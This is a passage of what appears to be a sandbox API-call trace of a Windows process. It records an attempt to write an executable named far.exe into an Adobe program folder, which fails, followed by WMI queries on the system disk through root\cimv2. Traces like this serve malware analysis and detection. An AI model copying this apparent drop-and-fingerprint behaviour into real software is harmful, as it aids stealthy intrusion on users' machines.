(x86)\\Adobe\\far.exe", lpFilePart=0x0) returned 0x24 [0166.586] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6ceec24) returned 1 [0166.586] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\far.exe" (normalized: "c:\\program files (x86)\\adobe\\far.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0166.588] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6ceda60) returned 1 [0166.588] CoTaskMemAlloc (cb=0x20c) returned 0x7b3f80 [0166.588] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x7b3f80 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0166.588] CoTaskMemFree (pv=0x7b3f80) [0166.588] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x6cee718, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0166.588] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6ceec60 | out: ppv=0x6ceec60*=0x72015c) returned 0x0 [0166.589] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x6ceec58 | out: pAptType=0x6ceec58*=1) returned 0x0 [0166.589] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6ceec5c | out: ppvObject=0x6ceec5c*=0x0) returned 0x80004002 [0166.589] IUnknown:Release (This=0x72015c) returned 0x1 [0166.590] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6cee5c8 | out: ppv=0x6cee5c8*=0x6736f08) returned 0x0 [0166.590] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736f08, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6cee7e0 | out: ppvObject=0x6cee7e0*=0x0) returned 0x80004002 [0166.590] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736f08, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee7f4 | out: ppvObject=0x6cee7f4*=0x6738af0) returned 0x0 [0166.590] WbemDefPath:IUnknown:Release (This=0x6736f08) returned 0x0 [0166.590] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738af0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee414 | out: ppvObject=0x6cee414*=0x6738af0) returned 0x0 [0166.590] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738af0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6cee3d0 | out: ppvObject=0x6cee3d0*=0x0) returned 0x80004002 [0166.590] WbemDefPath:IUnknown:AddRef (This=0x6738af0) returned 0x3 [0166.590] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738af0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6cedd2c | out: ppvObject=0x6cedd2c*=0x0) returned 0x80004002 [0166.590] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738af0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6cedcdc | out: ppvObject=0x6cedcdc*=0x0) returned 0x80004002 [0166.590] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738af0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cedce8 | out: ppvObject=0x6cedce8*=0x77c008) returned 0x0 [0166.590] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x77c008, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6cedcf0 | out: pCid=0x6cedcf0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0166.590] WbemDefPath:IUnknown:Release (This=0x77c008) returned 0x3 [0166.590] CoGetContextToken (in: pToken=0x6cedd48 | out: pToken=0x6cedd48) returned 0x0 [0166.591] CoGetContextToken (in: pToken=0x6cee150 | out: pToken=0x6cee150) returned 0x0 [0166.591] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738af0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee1e0 | out: ppvObject=0x6cee1e0*=0x0) returned 0x80004002 [0166.591] WbemDefPath:IUnknown:Release (This=0x6738af0) returned 0x2 [0166.591] WbemDefPath:IUnknown:Release (This=0x6738af0) returned 0x1 [0166.591] CoGetContextToken (in: pToken=0x6ceead8 | out: pToken=0x6ceead8) returned 0x0 [0166.591] CoGetContextToken (in: pToken=0x6ceea38 | out: pToken=0x6ceea38) returned 0x0 [0166.591] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738af0, riid=0x6ceeb08*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6ceeb04 | out: ppvObject=0x6ceeb04*=0x6738af0) returned 0x0 [0166.591] WbemDefPath:IUnknown:AddRef (This=0x6738af0) returned 0x3 [0166.591] WbemDefPath:IUnknown:Release (This=0x6738af0) returned 0x2 [0166.591] WbemDefPath:IWbemPath:SetText (This=0x6738af0, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0166.591] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738af0, puCount=0x6ceec8c | out: puCount=0x6ceec8c*=0x0) returned 0x0 [0166.591] WbemDefPath:IWbemPath:GetText (in: This=0x6738af0, lFlags=2, puBuffLength=0x6ceec88*=0x0, pszText=0x0 | out: puBuffLength=0x6ceec88*=0x20, pszText=0x0) returned 0x0 [0166.591] WbemDefPath:IWbemPath:GetText (in: This=0x6738af0, lFlags=2, puBuffLength=0x6ceec88*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6ceec88*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0166.591] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738af0, uRequestedInfo=0x0, puResponse=0x6ceec94 | out: puResponse=0x6ceec94*=0xc19) returned 0x0 [0166.591] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738af0, puCount=0x6ceec8c | out: puCount=0x6ceec8c*=0x0) returned 0x0 [0166.591] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738af0, uRequestedInfo=0x0, puResponse=0x6ceec94 | out: puResponse=0x6ceec94*=0xc19) returned 0x0 [0166.591] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738af0, uRequestedInfo=0x0, puResponse=0x6ceec94 | out: puResponse=0x6ceec94*=0xc19) returned 0x0 [0166.591] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738af0, puCount=0x6ceec0c | out: puCount=0x6ceec0c*=0x0) returned 0x0 [0166.591] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67209c0, puCount=0x6ceebf8 | out: puCount=0x6ceebf8*=0x2) returned 0x0 [0166.591] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x6ceebf4*=0x0, pszText=0x0 | out: puBuffLength=0x6ceebf4*=0xf, pszText=0x0) returned 0x0 [0166.591] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x6ceebf4*=0xf, pszText="00000000000000" | out: puBuffLength=0x6ceebf4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0166.591] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6ceeba8 | out: ppv=0x6ceeba8*=0x72015c) returned 0x0 [0166.591] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x6ceeba0 | out: pAptType=0x6ceeba0*=1) returned 0x0 [0166.592] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6ceeba4 | out: ppvObject=0x6ceeba4*=0x0) returned 0x80004002 [0166.592] IUnknown:Release (This=0x72015c) returned 0x1 [0166.592] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6cee510 | out: ppv=0x6cee510*=0x6736e98) returned 0x0 [0166.592] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736e98, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6cee728 | out: ppvObject=0x6cee728*=0x0) returned 0x80004002 [0166.592] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736e98, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee73c | out: ppvObject=0x6cee73c*=0x6738b60) returned 0x0 [0166.592] WbemDefPath:IUnknown:Release (This=0x6736e98) returned 0x0 [0166.593] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738b60, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee35c | out: ppvObject=0x6cee35c*=0x6738b60) returned 0x0 [0166.593] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738b60, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6cee318 | out: ppvObject=0x6cee318*=0x0) returned 0x80004002 [0166.593] WbemDefPath:IUnknown:AddRef (This=0x6738b60) returned 0x3 [0166.593] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738b60, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6cedc74 | out: ppvObject=0x6cedc74*=0x0) returned 0x80004002 [0166.593] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738b60, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6cedc24 | out: ppvObject=0x6cedc24*=0x0) returned 0x80004002 [0166.593] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738b60, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cedc30 | out: ppvObject=0x6cedc30*=0x7ae5e0) returned 0x0 [0166.593] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x7ae5e0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6cedc38 | out: pCid=0x6cedc38*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0166.593] WbemDefPath:IUnknown:Release (This=0x7ae5e0) returned 0x3 [0166.593] CoGetContextToken (in: pToken=0x6cedc90 | out: pToken=0x6cedc90) returned 0x0 [0166.593] CoGetContextToken (in: pToken=0x6cee098 | out: pToken=0x6cee098) returned 0x0 [0166.593] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738b60, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee128 | out: ppvObject=0x6cee128*=0x0) returned 0x80004002 [0166.593] WbemDefPath:IUnknown:Release (This=0x6738b60) returned 0x2 [0166.593] WbemDefPath:IUnknown:Release (This=0x6738b60) returned 0x1 [0166.593] CoGetContextToken (in: pToken=0x6ceea20 | out: pToken=0x6ceea20) returned 0x0 [0166.593] CoGetContextToken (in: pToken=0x6cee980 | out: pToken=0x6cee980) returned 0x0 [0166.593] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738b60, riid=0x6ceea50*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6ceea4c | out: ppvObject=0x6ceea4c*=0x6738b60) returned 0x0 [0166.593] WbemDefPath:IUnknown:AddRef (This=0x6738b60) returned 0x3 [0166.593] WbemDefPath:IUnknown:Release (This=0x6738b60) returned 0x2 [0166.593] WbemDefPath:IWbemPath:SetText (This=0x6738b60, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0166.593] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738b60, puCount=0x6ceebd0 | out: puCount=0x6ceebd0*=0x2) returned 0x0 [0166.593] WbemDefPath:IWbemPath:GetText (in: This=0x6738b60, lFlags=4, puBuffLength=0x6ceebcc*=0x0, pszText=0x0 | out: puBuffLength=0x6ceebcc*=0xf, pszText=0x0) returned 0x0 [0166.593] WbemDefPath:IWbemPath:GetText (in: This=0x6738b60, lFlags=4, puBuffLength=0x6ceebcc*=0xf, pszText="00000000000000" | out: puBuffLength=0x6ceebcc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0166.594] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6ceebd0 | out: ppv=0x6ceebd0*=0x72015c) returned 0x0 [0166.594] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x6ceebc8 | out: pAptType=0x6ceebc8*=1) returned 0x0 [0166.594] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6ceebcc | out: ppvObject=0x6ceebcc*=0x0) returned 0x80004002 [0166.594] IUnknown:Release (This=0x72015c) returned 0x1 [0166.594] CoGetClassObject (in: rclsid=0x7588d4*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6cee7f0 | out: ppv=0x6cee7f0*=0x672f328) returned 0x0 [0166.594] WbemLocator:IUnknown:QueryInterface (in: This=0x672f328, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6ceea08 | out: ppvObject=0x6ceea08*=0x0) returned 0x80004002 [0166.594] WbemLocator:IClassFactory:CreateInstance (in: This=0x672f328, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ceea1c | out: ppvObject=0x6ceea1c*=0x67370b8) returned 0x0 [0166.594] WbemLocator:IUnknown:Release (This=0x672f328) returned 0x0 [0166.594] WbemLocator:IUnknown:QueryInterface (in: This=0x67370b8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee63c | out: ppvObject=0x6cee63c*=0x67370b8) returned 0x0 [0166.595] WbemLocator:IUnknown:QueryInterface (in: This=0x67370b8, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6cee5f8 | out: ppvObject=0x6cee5f8*=0x0) returned 0x80004002 [0166.595] WbemLocator:IUnknown:AddRef (This=0x67370b8) returned 0x3 [0166.595] WbemLocator:IUnknown:QueryInterface (in: This=0x67370b8, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6cedf54 | out: ppvObject=0x6cedf54*=0x0) returned 0x80004002 [0166.595] WbemLocator:IUnknown:QueryInterface (in: This=0x67370b8, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6cedf04 | out: ppvObject=0x6cedf04*=0x0) returned 0x80004002 [0166.595] WbemLocator:IUnknown:QueryInterface (in: This=0x67370b8, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cedf10 | out: ppvObject=0x6cedf10*=0x0) returned 0x80004002 [0166.595] CoGetContextToken (in: pToken=0x6cedf70 | out: pToken=0x6cedf70) returned 0x0 [0166.595] CoGetContextToken (in: pToken=0x6cee378 | out: pToken=0x6cee378) returned 0x0 [0166.595] WbemLocator:IUnknown:QueryInterface (in: This=0x67370b8, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee408 | out: ppvObject=0x6cee408*=0x0) returned 0x80004002 [0166.595] WbemLocator:IUnknown:Release (This=0x67370b8) returned 0x2 [0166.595] WbemLocator:IUnknown:Release (This=0x67370b8) returned 0x1 [0166.595] CoGetContextToken (in: pToken=0x6cee9e8 | out: pToken=0x6cee9e8) returned 0x0 [0166.595] CoGetContextToken (in: pToken=0x6cee948 | out: pToken=0x6cee948) returned 0x0 [0166.595] WbemLocator:IUnknown:QueryInterface (in: This=0x67370b8, riid=0x6ceea18*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x6ceea14 | out: ppvObject=0x6ceea14*=0x67370b8) returned 0x0 [0166.595] WbemLocator:IUnknown:AddRef (This=0x67370b8) returned 0x3 [0166.595] WbemLocator:IUnknown:Release (This=0x67370b8) returned 0x2 [0166.595] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738b60, puCount=0x6ceebac | out: puCount=0x6ceebac*=0x2) returned 0x0 [0166.595] WbemDefPath:IWbemPath:GetText (in: This=0x6738b60, lFlags=8, puBuffLength=0x6ceeba8*=0x0, pszText=0x0 | out: puBuffLength=0x6ceeba8*=0xf, pszText=0x0) returned 0x0 [0166.595] WbemDefPath:IWbemPath:GetText (in: This=0x6738b60, lFlags=8, puBuffLength=0x6ceeba8*=0xf, pszText="00000000000000" | out: puBuffLength=0x6ceeba8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0166.595] CoCreateInstance (in: rclsid=0x745f1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x745f12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x6ceea84 | out: ppv=0x6ceea84*=0x67370c8) returned 0x0 [0166.595] WbemLocator:IWbemLocator:ConnectServer (in: This=0x67370c8, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x6ceeb18 | out: ppNamespace=0x6ceeb18*=0x672f04c) returned 0x0 [0167.563] WbemLocator:IUnknown:QueryInterface (in: This=0x672f04c, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee9b4 | out: ppvObject=0x6cee9b4*=0x781cc4) returned 0x0 [0167.563] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x781cc4, pProxy=0x672f04c, pAuthnSvc=0x6ceea04, pAuthzSvc=0x6ceea00, pServerPrincName=0x6cee9f8, pAuthnLevel=0x6cee9fc, pImpLevel=0x6cee9ec, pAuthInfo=0x6cee9f0, pCapabilites=0x6cee9f4 | out: pAuthnSvc=0x6ceea04*=0xa, pAuthzSvc=0x6ceea00*=0x0, pServerPrincName=0x6cee9f8, pAuthnLevel=0x6cee9fc*=0x6, pImpLevel=0x6cee9ec*=0x2, pAuthInfo=0x6cee9f0, pCapabilites=0x6cee9f4*=0x1) returned 0x0 [0167.563] WbemLocator:IUnknown:Release (This=0x781cc4) returned 0x1 [0167.563] WbemLocator:IUnknown:QueryInterface (in: This=0x672f04c, riid=0x745f10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee9a8 | out: ppvObject=0x6cee9a8*=0x781ce4) returned 0x0 [0167.563] WbemLocator:IUnknown:QueryInterface (in: This=0x672f04c, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee9a4 | out: ppvObject=0x6cee9a4*=0x781cc4) returned 0x0 [0167.563] WbemLocator:IClientSecurity:SetBlanket (This=0x781cc4, pProxy=0x672f04c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0167.563] WbemLocator:IUnknown:Release (This=0x781cc4) returned 0x2 [0167.563] WbemLocator:IUnknown:Release (This=0x781ce4) returned 0x1 [0167.563] CoTaskMemFree (pv=0x77e058) [0167.564] WbemLocator:IUnknown:Release (This=0x67370c8) returned 0x0 [0167.564] WbemLocator:IUnknown:QueryInterface (in: This=0x672f04c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee5a4 | out: ppvObject=0x6cee5a4*=0x781ce4) returned 0x0 [0167.564] WbemLocator:IUnknown:QueryInterface (in: This=0x781ce4, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6cee560 | out: ppvObject=0x6cee560*=0x0) returned 0x80004002 [0167.565] WbemLocator:IUnknown:QueryInterface (in: This=0x781ce4, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6cee37c | out: ppvObject=0x6cee37c*=0x0) returned 0x80004002 [0167.566] WbemLocator:IUnknown:AddRef (This=0x781ce4) returned 0x3 [0167.566] WbemLocator:IUnknown:QueryInterface (in: This=0x781ce4, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6cedebc | out: ppvObject=0x6cedebc*=0x0) returned 0x80004002 [0167.567] WbemLocator:IUnknown:QueryInterface (in: This=0x781ce4, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6cede6c | out: ppvObject=0x6cede6c*=0x0) returned 0x80004002 [0167.568] WbemLocator:IUnknown:QueryInterface (in: This=0x781ce4, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), 